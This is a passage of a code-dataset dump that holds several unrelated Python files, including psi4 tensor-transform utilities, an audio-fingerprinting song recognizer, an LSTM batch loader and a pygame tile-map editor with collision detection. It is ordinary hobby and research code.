10, 5, 5, 1, 1, 1, 1, 1]\n\n\ndef make_change_for_100(bills):\n \"\"\"\n Finds the number of ways we can make change for a 100 dollar bill, given the\n list of the dollar bills\n An example:\n >>> bill_list = [20, 20, 20, 10, 10, 10, 10, 10, 5, 5, 1, 1, 1, 1, 1]\n >>> make_change_for_100(bill_list)\n 5\n\n :return: Number of ways of making change for a 100 dollar bill\n :rtype: int\n \"\"\"\n result = []\n\n for n in range(1, len(bills) + 1):\n for combination in combinations(bills, n):\n if sum(combination) == 100:\n result.append(combination)\n\n return len(set(result))\n\n\ndef make_change_for_100_with_any():\n \"\"\"\n Finds the number of possible combinations of $50, $20, $10, $5, and $1 bills that sum up to $100\n An examples:\n >>> make_change_for_100_with_any()\n 343\n\n :return: Number of all possible combinations to sum up to 100\n :rtype: int\n \"\"\"\n bills = [50, 20, 10, 5, 1]\n makes_100 = []\n\n for n in range(1, 101):\n for combination in combinations_with_replacement(bills, n):\n if sum(combination) == 100:\n makes_100.append(combination)\n\n return len(makes_100)\n","repo_name":"BrianLusina/PythonSnips","sub_path":"algorithms/dollar_bills/make_change.py","file_name":"make_change.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"29692999391","text":"print(\"please enter the first whole number\")\nn = int(input())\nprint(\"please enter the second whole number\")\nm = int(input())\nprint(\"please enter the third whole number\")\nv = int(input())\no=0\ne=0\n\nif (n % 2 == 0):\n (\"\\n{} is an even number\".format(n))\n e=e+1\nelse:\n (\"\\n{} is an odd number\".format(n))\n o=o+1\nif (m % 2 == 0):\n (\"\\n{} is an even number\".format(m))\n e=e+1\nelse:\n (\"\\n{} is an odd number\".format(m))\n o=o+1\nif (v % 2 == 0):\n (\"\\n{} is an even number\".format(v))\n e=e+1\nelse:\n (\"\\n{} is an odd number\".format(v))\n o=o+1\nprint (\"There were {} even numbers and {} odd numbers\".format(e,o))","repo_name":"Aagash21/COM411--Problem-Solving-Through-Programming","sub_path":"basics/simple_decision/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71863293372","text":"#!/usr/bin/python3\n\"\"\"\n Workshop Utilities\n\"\"\"\nimport numpy\nimport psi4\n\ndef matrix_power(P, a):\n \"Power of a real symmetric matrix P^a\"\n p, U = numpy.linalg.eigh(P)\n #p = abs(p)\n p[p<0.0] = 0.0\n #if (p<=0.0).any(): raise ValueError(\" Matrix must be positive-definite!\")\n Pa = numpy.linalg.multi_dot([U, numpy.diag(p**a), U.T])\n return Pa\n\ndef psi_molecule_from_file(f, frm=None, no_com=True, no_reorient=True):\n \"Construct psi4.core.Molecule object from structure file\"\n if frm is None: frm = f.split('.')[-1].lower()\n #\n if frm == 'xyz':\n qmol = psi4.qcdb.Molecule.init_with_xyz(f, no_com=no_com, no_reorient=no_reorient) \n mol = psi4.geometry(qmol.create_psi4_string_from_molecule())\n else: raise ValueError(\"Unrecognised format - %s -\" % frm)\n #\n mol.update_geometry()\n return mol\n\ndef two_index_transform(int_ab, C1, C2):\n int_Ib = numpy.einsum(\"ab,aI->Ib\", int_ab, C1); del int_ab\n int_IJ = numpy.einsum(\"Ib,bJ->IJ\", int_Ib, C2); del int_Ib\n return int_IJ\n\ndef two_index_transform_full(int_ab, C1, C2):\n int_IJ = numpy.einsum(\"ab,aI,bJ->IJ\", int_ab, C1, C2)\n return int_IJ\n\ndef four_index_transform(eri_abcd, C1, C2, C3, C4):\n 
eri_Ibcd = numpy.einsum(\"abcd,aI->Ibcd\", eri_abcd, C1); del eri_abcd # cost: n^4 o\n eri_IJcd = numpy.einsum(\"Ibcd,bJ->IJcd\", eri_Ibcd, C2); del eri_Ibcd # cost: n^3 o^2\n eri_IJKd = numpy.einsum(\"IJcd,cK->IJKd\", eri_IJcd, C3); del eri_IJcd # cost: n^2 o^3\n eri_IJKL = numpy.einsum(\"IJKd,dL->IJKL\", eri_IJKd, C4); del eri_IJKd # cost: n o^4\n return eri_IJKL\n\ndef four_index_transform_full(eri_abcd, C1, C2, C3, C4):\n eri_IJKL = numpy.einsum(\"abcd,aI,bJ,cK,dL->IJKL\", eri_abcd, C1, C2, C3, C4) # cost: n^4 o^4\n return eri_IJKL\n \ndef _reorder(P,sim,axis=0):\n \"\"\"Reorders the tensor according to <axis> (default is 0). \n<sim> is the list of pairs from 'order' function. \nIn normal numbers (starting from 1...).\nCopied from LIBBBG code.\"\"\"\n P_new = numpy.zeros(P.shape,dtype=numpy.float64)\n if axis==0:\n for i,j in sim:\n P_new[i-1] = P[j-1]\n elif axis==1:\n for i,j in sim:\n P_new[:,i-1] = P[:,j-1]\n elif axis==2:\n for i,j in sim:\n P_new[:,:,i-1] = P[:,:,j-1]\n return P_new\n\ndef dot_sim(a,b):\n return numpy.dot(a.ravel(),b.ravel()) / numpy.linalg.norm(a) / numpy.linalg.norm(b)\ndef dis_sim(a,b):\n return numpy.sum((a-b)**2)\ndef cos_sim(a,b):\n return dot_sim(numpy.cos(a), numpy.cos(b))\ndef _order(R,P,start=0,lprint=1):\n \"\"\"order list: adapted from LIBBBG code\"\"\"\n new_P = P.copy()\n sim = []\n rad = []\n for i in range(len(R)-start):\n J = 0+start\n r = 1.0E+100\n rads = []\n a = R[i+start]\n for j in range(len(P)-start):\n #r_ = numpy.sum(( R[i+start]-P[j+start])**2)\n #r__= numpy.sum((-R[i+start]-P[j+start])**2)\n b = P[j+start]\n r_ = dis_sim(a,b)\n r__= dis_sim(-a,b)\n if r__<r_: r_=r__\n rads.append(r_)\n if r_<r:\n r=r_\n J = j\n sim.append((i+1,J+1))\n new_P[i+start] = P[J+start]\n rad.append(rads)\n for i in range(len(R)-start):\n s = numpy.sum(numpy.sign(new_P[i])/numpy.sign(R[i]))\n if lprint: print(\"%10d %f\" %(i+1,s))\n r_ = sum(( R[i+start]-new_P[i+start])**2)\n r__= sum((-R[i+start]-new_P[i+start])**2)\n \n #if s < -154: \n # print \"TUTAJ s < -154\"\n # #new_P[i]*=-1.\n if r__<r_:\n if lprint: print(\" HERE r__ < r_ (sign reversal)\")\n new_P[i]*=-1.\n return new_P, sim#, array(rad,dtype=float)\n\n\ndef rearrange_eigenpairs(u, u_ref, n=None, return_sim=False):\n \"\"\"\n Rearrange eigenpairs. Also rephase eigenvectors if sign difference is detected.\n Inputs : n: eigenvalues, u: eivenvectors (by column), u_ref: reference eigenvectors (by column)\n Requirement: u and u_ref need to be composed of same eigenvectors (sign arbitrary) that are in different order\n n and u need to have the same order of eigenelements.\n Returns : n_new, u_new - when n is provided \n u_new - when n is not provided\n (optional) :\n sim - similarity assignment list if return_sim=True. Returned as the last element.\n\"\"\"\n u_new, sim = _order(u_ref.T, u.T, lprint=0)\n u_new = u_new.T\n if n is not None:\n n_new = _reorder(n, sim)\n if return_sim: return n_new, u_new, sim\n else: return n_new, u_new\n else:\n if return_sim: return u_new, sim\n else: return u_new\n\ndef check_sim(l):\n \"\"\"check the sim list\"\"\"\n log = ' --- OK ---'\n for x,y in l:\n i=0;j=0\n for a,b in l:\n if a==x: i+=1\n if b==y: j+=1\n if (i>1 or j>1): \n log = \" --- !ERROR! 
--- \"\n break\n return log\n","repo_name":"globulion/qc-workshop","sub_path":"tutor/psithon/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"23442389030","text":"from Texture import Texture\r\nfrom Image import *\r\n\r\nclass TextureManager:\r\n\r\n def __init__(self):\r\n self.textures = {}\r\n self.images = {}\r\n\r\n def get(self, name):\r\n if name not in self.textures:\r\n return None\r\n texture = self.textures[name]\r\n if not texture.glID:\r\n return self.loadTexture(name, texture.target, texture.parameters, texture.settings)\r\n return texture\r\n\r\n def loadTexture(self, name, target, param = Texture.Parameters(), settings = Texture.Settings()):\r\n if name in self.textures:\r\n return self.textures[name]\r\n if name not in self.images:\r\n return None\r\n image = self.images[name]\r\n self.textures[name] = texture = Texture.create(name, image.data, image.width, image.height,\r\n target, image.textureFormat, param, settings)\r\n return texture\r\n\r\n def loadImage(self, name, filepath, format = None):\r\n if name in self.images:\r\n return self.images[name]\r\n image = Image(filepath, format)\r\n if image.data:\r\n self.images[name] = image\r\n return image\r\n else: return None\r\n \r\n def add(self, name, image, texture):\r\n self.textures[name] = texture\r\n self.images[name] = image\r\n\r\n def deleteFromVRAM(self, name):\r\n if name in self.textures:\r\n if self.textures[name].glID:\r\n self.textures[name].delete()\r\n\r\n def deleteFromRAM(self, name):\r\n if name in self.images:\r\n del self.images[name]\r\n\r\n def delete(self, name):\r\n self.deleteFromVRAM(name)\r\n self.deleteFromRAM(name)\r\n\r\n def size(self):\r\n return len(self.textures)\r\n \r\n","repo_name":"rosedu/hfall","sub_path":"trunk/hfall/Parser/TextureManager.py","file_name":"TextureManager.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71717374331","text":"# Assembled functions to be used in the final sound-recognition program,\n# distinguishes the different processes involved with sound-recognition\n\nimport numpy as np\nfrom microphone import record_audio\nimport librosa\nimport pathlib\nimport pickle\nfrom collections import Counter\n\nfrom .databases import *\nfrom .find_peaks import *\nfrom .fingerprint import *\nfrom .digital_sampling import *\n\ndef digital_sample():\n \"\"\"\n Prompts the user for a file or microphone recording to be used in populating/querying the database\n\n Parameters\n ----------\n None \n\n Returns\n ------\n (samples, times) : Tuple[ndarray, ndarray]\n The shape-(N,) array of samples and the corresponding shape-(N,) array of times\n \"\"\"\n recording_type = int(input(\"Enter 0 to load an audio file, Enter 1 to record from the microphone: \"))\n samples = np.array([])\n times = np.array([])\n # Audio File Sample\n if recording_type == 0:\n filename = input(\"What's the name of the desired audio file? (Include file extension): \")\n cliptime = int(input(\"How many seconds should the audio file be sampled for? \"))\n samples, times = filesample(filename, cliptime)\n # Microphone Recording Sample\n elif recording_type == 1:\n listentime = int(input(\"How many seconds should the microphone record? 
\"))\n samples, times = micsample(listentime)\n # Invalid Option\n else:\n print(\"Error: Invalid Option\") \n return samples, times\n\ndef initialize_database():\n \"\"\"\n Initalizes a dictionary database \n\n Parameters\n ----------\n None\n \n Returns\n ------\n database : dict\n initialized database\n \"\"\"\n database = {}\n dictionary_type = int(input(\"Enter 0 to input a pickled dictionary, Enter 1 to have it initialized: \"))\n # Pickled Dictionary\n if dictionary_type == 0:\n file_path = input(\"Enter the file path and file name to the dictionary: \")\n database = load_dictionary(file_path)\n # We initialized \n elif dictionary_type == 1:\n pass\n # Invalid Option\n else:\n print(\"Error: Invalid Option\") \n return database\n \ndef query_database(samples, times, fingerprint_database, artist_database, amp_min_percent = 75, cutoff = 20): \n \"\"\"\n Finds spectrogram, peaks, and fingerprints from given digital sample and returns final song ID\n\n Parameters\n ----------\n samples : ndarray\n the shape-(N,) array of samples\n \n times : ndarray\n the shape-(N,) array of times\n \n Returns\n ------\n final_song_info : Tuple(string, string)\n the artist & song name guessed by wahzam\n \"\"\"\n # Empty check\n if(samples.size == 0 or times.size == 0):\n return tuple()\n # Make spectrogram\n spectrogram = make_spectogram(samples, times)\n # Find peaks\n peak_indices = local_peak_locations(spectrogram, amp_min_percent, cutoff)\n # Find fingerprints\n prints, init_times = findsfingerprints(peak_indices, fanoutsize = 15)\n # Get song id and song info from databases, return guesses song\n final_song_id = give_matched_songid(prints, fingerprint_database, init_times)\n final_song_info = get_info(final_song_id, artist_database)\n return final_song_info\n\ndef populate_database(songname, artistname, samples, times, fingerprint_database, artist_database, amp_min_percent = 75, cutoff = 20):\n \"\"\"\n Populate the dictionary database \n\n Parameters\n ----------\n fingerprints: List\n list of the fingerprints from the song\n abs_times: List \n list of the absolute times, each of which corresponds to a fingerprint at the same index\n name: string\n song name\n artist: string\n artist name\n fingerprints: List\n List of each fingerprint for the song corresponding to songid\n artist_database: Dict\n Database that maps songid to artist name and song name\n fingerprint_database: dictionary\n database of the fingerprints\n \n Returns\n ------\n List[Dict]:\n The two populated databases\n\n \"\"\"\n spec = make_spectogram(samples,times)\n peakindices = local_peak_locations(spec, amp_min_percent, cutoff)\n fingerprints, init_times = findsfingerprints(peakindices, fanoutsize = 15)\n \n #add_artist_info(songname, artistname, artist_database)\n add_song(fingerprints, init_times, songname, artistname, artist_database, fingerprint_database)\n return [artist_database, fingerprint_database]","repo_name":"bpanguluru/wahzam-","sub_path":"wahzam/main_functions.py","file_name":"main_functions.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32684532320","text":"# This class loads the feature matrix and target vector stored in a CSV file\n# It contains methods for dividing the data into training and test batches\n# It also contains methods for shuffling and retrieving batches for training\n\n# Load relevant packages\nimport numpy as np\nfrom tensorflow.python.platform import gfile\nimport csv\n\n# Define class 
with all its variables\nclass PSGData:\n\n def __init__(self, filename, time_steps):\n self.filename = filename\n self.time_steps = time_steps\n self.features = []\n self.targets = []\n self.n_samples = 5136827\n self.n_features = 35\n self.n_outputs = 1\n self.num_batches = 0\n self.train_iteration = -1\n self.test_iteration = -1\n self.train_batch_order = np.array([])\n self.test_batch_order = np.array([])\n self.split_data()\n\n # Define method for loading CSV file containing features and targets\n def load_csv(self, filename, features_dtype, target_dtype):\n\n with gfile.Open(filename) as csv_file:\n data_file = csv.reader(csv_file)\n data = np.zeros((self.n_samples, self.n_features), dtype=features_dtype)\n target = np.zeros((self.n_samples, ), dtype=target_dtype)\n\n for i, row in enumerate(data_file):\n target[i] = np.asarray(row.pop(-1), dtype=target_dtype)\n data[i] = np.asarray(row, dtype=features_dtype)\n\n return data, target\n\n # Define method for splitting data into training and test sets\n def split_data(self):\n\n features, targets = self.load_csv(self.filename, features_dtype=np.float32, target_dtype=np.float32)\n self.features = features\n self.targets = targets\n self.num_batches = len(targets)/self.time_steps\n batch_order = np.arange(self.num_batches)\n self.train_batch_order = np.random.permutation(batch_order[0:42123])\n self.test_batch_order = batch_order[42123:len(batch_order)]\n\n # Define method for reshuffling training batches when epoch is completed\n def new_epoch(self):\n\n self.train_iteration = -1\n self.train_batch_order = np.random.permutation(self.train_batch_order)\n\n # Define method for resetting iterations for the test batches\n def new_test(self):\n\n self.test_iteration = -1\n\n # Define method for reshaping training batch to match input required to LSTM\n def get_train_batch(self, batch_idx):\n\n batch_num = self.train_batch_order[batch_idx]\n idx = np.arange(batch_num*self.time_steps, (batch_num+1)*self.time_steps, step=1, dtype=np.int)\n x = self.features[idx, :]\n x = np.reshape(x, newshape=[-1, self.time_steps, self.n_features], order='F')\n y = self.targets[idx]\n y = np.reshape(y, newshape=[-1, self.time_steps, self.n_outputs])\n\n return x, y\n\n # Define method for reshaping test batch to match input required to LSTM\n def get_test_batch(self, batch_idx):\n\n batch_num = self.test_batch_order[batch_idx]\n idx = np.arange(batch_num*self.time_steps, (batch_num+1)*self.time_steps, step=1, dtype=np.int)\n x = self.features[idx, :]\n x = np.reshape(x, newshape=[-1, self.time_steps, self.n_features], order='F')\n y = self.targets[idx]\n y = np.reshape(y, newshape=[-1, self.time_steps, self.n_outputs])\n\n return x, y\n\n # Define method for getting the next batch (either training or test)\n def next_batch(self, batch_type):\n\n if batch_type == 'Train':\n self.train_iteration += 1\n if (self.train_iteration + 1) > len(self.train_batch_order):\n self.new_epoch()\n x, y = self.get_train_batch(self.train_iteration)\n\n elif batch_type == 'Test':\n self.test_iteration += 1\n if (self.test_iteration + 1) > len(self.test_batch_order):\n self.new_test()\n x, y = self.get_test_batch(self.test_iteration)\n\n return x, y\n","repo_name":"urh92/Prediction-of-esophageal-pressure","sub_path":"load_data_lstm.py","file_name":"load_data_lstm.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72747141691","text":"#map tile example using a map of tile objects 
along with tile collision detection\n\nimport pygame\nimport time\nimport os.path\n\nfilepath = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'assets') # this joins the path of our script and our new direction 'assets'\ntry:\n os.makedirs(filepath) # if the 'assets' directory does not exist create it\nexcept:\n pass\n\ndef collideCircleRectangle(circle_x,circle_y,circle_radius,rect_x1,rect_y1,rect_x2,rect_y2):\n \"\"\"CollideCircleRectangle(circle_x,circle_y,circle_radius,rect_x1,rect_y1,rect_x2,rect_y2) - Returns True if the circle collides with the rectangle, False otherwise \"\"\"\n if((rect_x1-circle_radius<=circle_x<=rect_x2+circle_radius or rect_x2-circle_radius<=circle_x<=rect_x1+circle_radius) and (rect_y1<=circle_y<=rect_y2 or rect_y2<=circle_y<=rect_y1)) or ((rect_x1<=circle_x<=rect_x2 or rect_x2<=circle_x<=rect_x1) and (rect_y1-circle_radius<=circle_y<=rect_y2+circle_radius or rect_y2-circle_radius<=circle_y<=rect_y1+circle_radius)):\n return True\n else:\n if collidePointCircle(rect_x1,rect_y1,circle_x,circle_y,circle_radius):\n return True\n elif collidePointCircle(rect_x2,rect_y2,circle_x,circle_y,circle_radius):\n return True\n elif collidePointCircle(rect_x1,rect_y2,circle_x,circle_y,circle_radius):\n return True\n elif collidePointCircle(rect_x2,rect_y1,circle_x,circle_y,circle_radius):\n return True\n else:\n return False\n\ndef collidePointCircle(point_x,point_y,circle_x,circle_y,circle_radius):\n \"\"\"CollidePointCircle(point_x,point_y,circle_x,circle_y,circle_radius) - Returns True if the point collides with the circle, False otherwise.\"\"\"\n if ((point_x-circle_x)**2 + (point_y-circle_y)**2)**0.5 <= circle_radius:\n return True\n else:\n return False\n\nclass TileType(object):\n def __init__(self,tileSourceFilename=None,tileSourceColRow=(0,0),tileWidth=32,tileHeight=32,tileCollides=True,isBack=False,isVisible=True):\n (tileSourceCol,tileSourceRow)=tileSourceColRow\n self.tileSourceFilename=tileSourceFilename\n self.tileSourceCol=tileSourceCol\n self.tileSourceRow=tileSourceRow\n self.tileWidth=tileWidth\n self.tileHeight=tileHeight\n self.tileCollides=tileCollides\n self.isBack=isBack\n self.isVisible=isVisible\n self.mask = pygame.image.load(os.path.join(filepath, \"mask.png\"))\n if tileSourceFilename!=None:\n tilesetSurf=pygame.image.load(os.path.join(filepath, tileSourceFilename) )\n tilesetSurf.convert_alpha()\n if self.isBack == False:\n self.tileSurf=pygame.Surface((tileWidth,tileHeight)) #make a new surface\n self.tileSurf.blit(tilesetSurf,(0,0),(tileSourceCol*tileWidth,tileSourceRow*tileHeight,tileWidth,tileHeight))\n else:\n self.tileSurf=pygame.Surface((tileWidth,tileHeight)) #make a new surface\n self.tileSurf.blit(tilesetSurf,(0,0),(tileSourceCol*tileWidth,tileSourceRow*tileHeight,tileWidth,tileHeight))\n self.tileSurf.blit(self.mask, (0,0))\n if self.isVisible == False:\n self.tileSurf.set_alpha(0)\n self.tileSurf.set_colorkey((0,0,0))\n def dumpsTileType(self):\n outList=[]\n outList.append(\"tileSourceFilename=\"+self.tileSourceFilename)\n outList.append(\"tileSourceCol=\"+str(self.tileSourceCol))\n outList.append(\"tileSourceRow=\"+str(self.tileSourceRow))\n outList.append(\"tileWidth=\"+str(self.tileWidth))\n outList.append(\"tileHeight=\"+str(self.tileHeight))\n outList.append(\"tileCollides=\"+str(self.tileCollides))\n outList.append(\"isBack=\"+str(self.isBack))\n outList.append(\"isVisible=\"+str(self.isVisible))\n s=\",\"\n return s.join(outList) \n def loadsTileType(self,inString):\n inList=inString.split(\",\")\n for item in 
inList:\n (key,value)=item.split(\"=\")\n if key==\"tileSourceCol\":\n self.tileSourceCol=int(value)\n elif key==\"tileSourceRow\":\n self.tileSourceRow=int(value)\n elif key==\"tileWidth\":\n self.tileWidth=int(value)\n elif key==\"tileHeight\":\n self.tileHeight=int(value)\n elif key==\"tileCollides\":\n if value==\"True\":\n self.tileCollides=True\n else:\n self.tileCollides=False\n elif key==\"tileSourceFilename\":\n self.tileSourceFilename=value\n elif key==\"isBack\":\n if value==\"True\":\n self.isBack=True\n else:\n self.isBack=False\n elif key==\"isVisible\":\n if value==\"True\":\n self.isVisible=True\n else:\n self.isVisible=False\n\n # reload the surface\n tilesetSurf=pygame.image.load(os.path.join(filepath, self.tileSourceFilename))\n if self.isBack == False:\n self.tileSurf=pygame.Surface((self.tileWidth,self.tileHeight)) #make a new surface\n self.tileSurf.blit(tilesetSurf,(0,0),(self.tileSourceCol*self.tileWidth,self.tileSourceRow*self.tileHeight,self.tileWidth,self.tileHeight))\n else:\n self.tileSurf=pygame.Surface((self.tileWidth,self.tileHeight)) #make a new surface\n mask = pygame.Surface((self.tileWidth, self.tileHeight))\n mask.fill((0,0,0))\n mask.set_alpha(68)\n self.tileSurf.blit(tilesetSurf,(0,0),(self.tileSourceCol*self.tileWidth,self.tileSourceRow*self.tileHeight,self.tileWidth,self.tileHeight))\n self.tileSurf.blit(mask, (0,0))\n if self.isVisible == False:\n self.tileSurf.set_alpha(0)\n self.tileSurf.set_colorkey((0,0,0))\n\nclass TileMap(object):\n def __init__(self,mapWidth=27,mapHeight=18,tileWidth=32,tileHeight=32):\n self.mapWidth=mapWidth\n self.mapHeight=mapHeight\n self.tileWidth=tileWidth\n self.tileHeight=tileHeight\n self.tileMap=[]\n for row in range(0,mapHeight):\n self.tileMap.append([None]*mapWidth)\n self.tileTypes={}\n def addTileType(self,tileId,tileType):\n self.tileTypes[tileId]=tileType\n def renderTile(self,screenCol,screenRow,mapEntry,screen):\n screenX=screenCol*self.tileWidth\n screenY=screenRow*self.tileHeight\n screen.blit(mapEntry.tileSurf,(screenX,screenY))\n def setTileMapEntry(self,mapCol,mapRow,tileTypeKey):\n if tileTypeKey==None:\n self.tileMap[mapRow][mapCol]=None\n else:\n self.tileMap[mapRow][mapCol]=tileTypeKey\n def renderMap(self,screen):\n for row in range(0,self.mapHeight):\n for col in range(0,self.mapWidth):\n mapEntryKey=self.tileMap[row][col]\n if mapEntryKey != None:\n self.renderTile(col,row,self.tileTypes[mapEntryKey],screen)\n def saveTileTypes(self,filename):\n filepath = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'maps') # this joins the path of our script and our new direction 'maps'\n filename = os.path.join(filepath, filename)\n try:\n os.makedirs(filepath) # if the 'maps' directory does not exist create it\n os.makedir(filename)\n fp = open(filename, \"w\")\n except:\n fp = open(filename, \"w\") # otherwise continue normally to save the file\n for tileType in sorted(self.tileTypes.keys()):\n fp.write(tileType+\":\"+self.tileTypes[tileType].dumpsTileType()+\"\\n\")\n fp.close()\n def loadTileTypes(self,filename):\n filename = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'maps', filename) # load our file from the 'maps' directory\n fp = open(filename, \"r\")\n \n for line in fp:\n line=line.strip()\n if len(line)==0 or line[0]=='#': # skip blank lines and comment lines\n continue\n (tileType,tileTypeDumpedString)=line.split(\":\") # divide the line into the two sides of the :\n self.tileTypes[tileType]=TileType()\n self.tileTypes[tileType].loadsTileType(tileTypeDumpedString) \n 
fp.close()\n def saveMap(self,filename):\n filepath = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'maps') # this joins the path of our script and our new direction 'maps'\n filename = os.path.join(filepath, filename)\n try:\n os.makedirs(filepath) # if the 'maps' directory does not exist create it\n os.makedir(filename)\n fp = open(filename, \"w\")\n except:\n fp = open(filename, \"w\") # otherwise continue normally to save the file\n fp.write(\"mapWidth=\"+str(self.mapWidth)+\"\\n\")\n fp.write(\"mapHeight=\"+str(self.mapHeight)+\"\\n\")\n fp.write(\"tileWidth=\"+str(self.tileWidth)+\"\\n\")\n fp.write(\"tileHeight=\"+str(self.tileHeight)+\"\\n\")\n fp.write(\"tileMap=\\n\")\n for row in range(0,self.mapHeight):\n for col in range(0,self.mapWidth):\n if self.tileMap[row][col]==None:\n fp.write(\"None\")\n else:\n mapEntry=self.tileMap[row][col]\n fp.write(mapEntry)\n if col<self.mapWidth-1: #suppress comma on last item in row\n fp.write(\",\") # comma is our column field delimiter\n fp.write(\"\\n\")\n fp.close()\n def loadMap(self,filename):\n filename = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'maps', filename) # load our file from the 'maps' directory\n fp = open(filename, \"r\")\n for line in fp:\n line=line.strip()\n if len(line)==0 or line[0]=='#': # skip blank lines and comment lines\n continue\n (attribute,value)=line.split(\"=\") # divide the line into the two sides of the equal\n if attribute==\"mapWidth\":\n self.mapWidth=int(value)\n if attribute==\"mapHeight\":\n self.mapHeight=int(value)\n if attribute==\"tileWidth\":\n self.tileWidth=int(value)\n if attribute==\"tileHeight\":\n self.tileHeight=int(value)\n if attribute==\"tileMap\":\n for row in range(0,self.mapHeight):\n mapline=fp.readline().strip() #read in row\n entry_list=mapline.split(\",\") #split row on comma\n for col in range(0,len(entry_list)):\n if entry_list[col]==\"None\":\n self.tileMap[row][col]=None\n else:\n self.tileMap[row][col]=entry_list[col]\n fp.close()\n def getCollisionSetCircle(self,testCircleX,testCircleY,testCircleR):\n collisionSet=[]\n for mapRow in range(0,self.mapHeight):\n for mapCol in range(0,self.mapWidth):\n mapEntryKey=self.tileMap[mapRow][mapCol]\n if mapEntryKey!=None:\n rectY1 = mapRow*self.tileTypes[mapEntryKey].tileHeight\n rectX1 = mapCol*self.tileTypes[mapEntryKey].tileWidth\n rectY2 = rectY1 + self.tileTypes[mapEntryKey].tileHeight\n rectX2 = rectX1 + self.tileTypes[mapEntryKey].tileWidth\n \n if collideCircleRectangle(testCircleX,testCircleY,testCircleR,rectX1,rectY1,rectX2,rectY2):\n tileCenterX=(rectX1+rectX2)/2\n tileCenterY=(rectY1+rectY2)/2\n tileDistance=distance(testCircleX,testCircleY,tileCenterX,tileCenterY)\n collisionSet.append(CollisionTile(mapEntryKey,mapCol,mapRow,tileCenterX,tileCenterY,tileDistance))\n return collisionSet\n\nclass CollisionTile(object):\n def __init__(self,mapEntryKey,mapCol,mapRow,mapTileCenterX,mapTileCenterY,collideDistance):\n self.mapEntryKey=mapEntryKey\n self.mapCol=mapCol\n self.mapRow=mapRow\n self.mapTileCenterX=mapTileCenterX\n self.mapTileCenterY=mapTileCenterY\n self.collideDistance=collideDistance\n\ndef distance(x1,y1,x2,y2):\n return ((x2-x1)**2+(y2-y1)**2)**0.5\n \ndef nextDictKey(dictionary,key):\n keyList = sorted(dictionary.keys())\n currentIndex=keyList.index(key)\n newIndex=currentIndex+1\n if newIndex>len(keyList)-1:\n newIndex=0\n \n return keyList[newIndex]\ndef prevDictKey(dictionary,key):\n keyList = sorted(dictionary.keys())\n currentIndex=keyList.index(key)\n newIndex=currentIndex-1\n if 
newIndex<0:\n newIndex=len(keyList)-1\n return keyList[newIndex]\n\nif __name__ == \"__main__\":\n\n current_map = \"level 1.txt\"\n pygame.init()\n\n screen = pygame.display.set_mode((864, 576), pygame.SWSURFACE, 32)\n\n map1 = TileMap()\n map1.loadMap(current_map)\n\n map1.addTileType(\"grass_back\",TileType(\"sprite_sheet.png\",(0,0),tileCollides=False,isBack=False))\n map1.addTileType(\"grass.100\",TileType(\"sprite_sheet.png\",(0,0), isBack=False))\n map1.addTileType(\"grass.75\",TileType(\"sprite_sheet.png\",(0,1),tileCollides=False, isBack=False))\n map1.addTileType(\"grass.50\",TileType(\"sprite_sheet.png\",(0,2),tileCollides=False, isBack=False))\n map1.addTileType(\"grass.25\",TileType(\"sprite_sheet.png\",(0,3),tileCollides=False, isBack=False))\n\n map1.addTileType(\"dirt_back\",TileType(\"sprite_sheet.png\",(1,0),tileCollides=False,isBack=True))\n map1.addTileType(\"dirt.100\",TileType(\"sprite_sheet.png\",(1,0)))\n map1.addTileType(\"dirt.75\",TileType(\"sprite_sheet.png\",(1,1),tileCollides=False))\n map1.addTileType(\"dirt.50\",TileType(\"sprite_sheet.png\",(1,2),tileCollides=False))\n map1.addTileType(\"dirt.25\",TileType(\"sprite_sheet.png\",(1,3),tileCollides=False))\n\n map1.addTileType(\"stone_back\",TileType(\"sprite_sheet.png\",(0,4),tileCollides=False,isBack=True))\n map1.addTileType(\"stone.100\",TileType(\"sprite_sheet.png\",(0,4)))\n map1.addTileType(\"stone.75\",TileType(\"sprite_sheet.png\",(0,5),tileCollides=False ))\n map1.addTileType(\"stone.50\",TileType(\"sprite_sheet.png\",(0,6),tileCollides=False ))\n map1.addTileType(\"stone.25\",TileType(\"sprite_sheet.png\",(0,7),tileCollides=False ))\n\n map1.addTileType(\"gravel_back\",TileType(\"sprite_sheet.png\",(1,4),tileCollides=False,isBack=True))\n map1.addTileType(\"gravel.100\",TileType(\"sprite_sheet.png\",(1,4)))\n map1.addTileType(\"gravel.75\",TileType(\"sprite_sheet.png\",(1,5),tileCollides=False ))\n map1.addTileType(\"gravel.50\",TileType(\"sprite_sheet.png\",(1,6),tileCollides=False ))\n map1.addTileType(\"gravel.25\",TileType(\"sprite_sheet.png\",(1,7),tileCollides=False ))\n\n map1.addTileType(\"mossybrick_back\",TileType(\"sprite_sheet.png\",(0,8),tileCollides=False,isBack=True))\n map1.addTileType(\"mossybrick.100\",TileType(\"sprite_sheet.png\",(0,8)))\n map1.addTileType(\"mossybrick.75\",TileType(\"sprite_sheet.png\",(0,9),tileCollides=False ))\n map1.addTileType(\"mossybrick.50\",TileType(\"sprite_sheet.png\",(0,10),tileCollides=False ))\n map1.addTileType(\"mossybrick.25\",TileType(\"sprite_sheet.png\",(0,11),tileCollides=False ))\n\n map1.addTileType(\"crackedbrick_back\",TileType(\"sprite_sheet.png\",(1,8),tileCollides=False,isBack=True))\n map1.addTileType(\"crackedbrick.100\",TileType(\"sprite_sheet.png\",(1,8)))\n 